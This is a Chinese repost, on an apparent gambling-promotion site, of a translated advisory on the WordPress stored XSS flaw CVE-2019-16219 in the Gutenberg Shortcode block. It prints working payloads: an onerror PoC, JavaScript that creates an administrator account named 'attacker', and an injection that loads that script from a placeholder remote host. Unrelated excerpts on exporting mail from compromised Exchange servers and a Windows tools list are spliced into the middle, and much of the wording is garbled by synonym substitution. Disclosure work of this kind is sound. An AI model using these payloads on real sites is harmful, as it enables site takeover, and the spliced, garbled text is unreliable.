CVE-2019-16219: WordPress (Core)存储型XSS破绽 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

CVE-2019-16219: WordPress (Core)存储型XSS破绽

申博_安全预警 申博 41次浏览 已收录 0个评论

渗透基础——从Exchange服务器上搜索和导出邮件

0x00 前言 在渗透测试中,如果我们获得了Exchange服务器的管理权限,下一步就需要对Exchange服务器的邮件进行搜索和导出,本文将要介绍常用的两种方法,开源4个powershell脚本,分享脚本编写细节。 0x01 简介 本文将要介绍以下内容: · 管理Exchange服务器上邮件的两种方法 · 导出邮件的两种方法 · 搜索邮件的两种方法 注:本文介绍的方法均为powershell命令。 0x02 管理Exchange服务器上邮件的两种方法 1.先使用PSSession连接Exchange服务器,进而远程管理邮件 使用PSSession连接Ex

破绽概述

WordPress是最主流的内容管理体系(CMS),占环球CMS市场份额的60.4%,远高于第二的Joomla!(5.2%)。因而,有凌驾1/3的网站运用WordPress。FortiGuard研究人员近期发明一个WordPress中的存储型XSS 0day破绽。该0day破绽是因为WordPress 5.0中新内置的Gutenberg激发的XSS破绽。该编辑器没有凌驾过滤Shortcode毛病音讯中的JavaScript/HTML代码。因而,有Contributor或更高权限的长途攻击者就能够在接见被黑页面的受害者浏览器中实行恣意JS/HTML代码。假如受害者有更高权限,比方administrator权限,攻击者以至能够入侵全部web服务器。

该XSS破绽CVE编号为 CVE-2019-16219,影响WordPress 5.0到5.0.4,5.1和5.1.1版本。

破绽剖析

在WordPress 5.0中,用户能够在文章中增加Shortcode块。在增加特定HTML编码的字符到Shortcode块,然后从新翻开文章时,就显现毛病信息,以&lt;字符为例,预览时会解码&lt;为<。

预览时的XSS过滤器能够很容易地过滤,比方POC”&gt;&lt;img src=1 onerror=prompt(1)&gt;:

CVE-2019-16219: WordPress (Core)存储型XSS破绽

图3. 插进去PoC代码到Shortcode块

受害者检察文章时,XSS代码就会在浏览器中实行。

CVE-2019-16219: WordPress (Core)存储型XSS破绽

图4. WordPress Shortcode Preview XSS

值得收藏!史上最全Windows安全工具锦集

“工欲善其事,必先利其器。” 近日,深信服安全团队整理了一些常见的PE工具、调试反汇编工具、应急工具、流量分析工具和WebShell查杀工具,希望可以帮助到一些安全行业的初学者。 PE工具篇 PEiD 一款著名的PE侦壳工具,可以检测PE常见的一些壳,但是目前已经无法从官网获得: EXEInfo PE PE侦壳工具,PEiD的加强版,可以查看EXE/DLL文件编译器信息、是否加壳、入口点地址、输出表/输入表等等PE信息: 下载地址:http://www.exeinfo.xn.pl/ Detect It Easy 开源的PE侦壳工具,是一个跨

假如受害者有admin权限,攻击者就能够应用该破绽来猎取管理员账号的完整,运用WordPress内置功能来GetShell。然后掌握服务器。

比方,攻击者能够在web服务器上坚持JS文件,如wpaddadmin[.]jshttps://g0blin.co.uk/xss-and-wordpress-the-aftermath/ 。JS代码会用用户名attacker和暗码attacker增加一个WordPress管理员账号。

// Send a GET request to the URL '/wordpress/wp-admin/user-new.php', and extract the current 'nonce' valuevar ajaxRequest = new XMLHttpRequest();var requestURL = "/wordpress/wp-admin/user-new.php";var nonceRegex = /ser" value="([^"]*?)"/g;ajaxRequest.open("GET", requestURL, false);ajaxRequest.send();var nonceMatch = nonceRegex.exec(ajaxRequest.responseText);var nonce = nonceMatch[1];// Construct a POST query, using the previously extracted 'nonce' value, and create a new user with an arbitrary username / password, as an Administratorvar params = "action=createuser&_wpnonce_create-user="+nonce+"&user_login=attacker&[email protected]&pass1=attacker&pass2=attacker&role=administrator";ajaxRequest = new XMLHttpRequest();ajaxRequest.open("POST", requestURL, true);ajaxRequest.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");ajaxRequest.send(params);

然后攻击者就能够用下面的POC来插进去JS:

“"&gt;&lt;img src=1 onerror="javascript&colon;(function () { var url = 'http://aaa.bbb.ccc.ddd/ wpaddadmin.js';if (typeof beef == 'undefined') { var bf = document.createElement('script'); bf.type = 'text/javascript'; bf.src = url; document.body.appendChild(bf);}})();"&gt;”

高权限的受害者检察该post时,就会建立管理员帐户attacker。

CVE-2019-16219: WordPress (Core)存储型XSS破绽

 

CVE-2019-16219: WordPress (Core)存储型XSS破绽

图9. 掌握web服务

现在WordPress已宣布了补丁,研究人员发起用户升级到最新的WordPress版本。

本文翻译自:https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明CVE-2019-16219: WordPress (Core)存储型XSS破绽
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址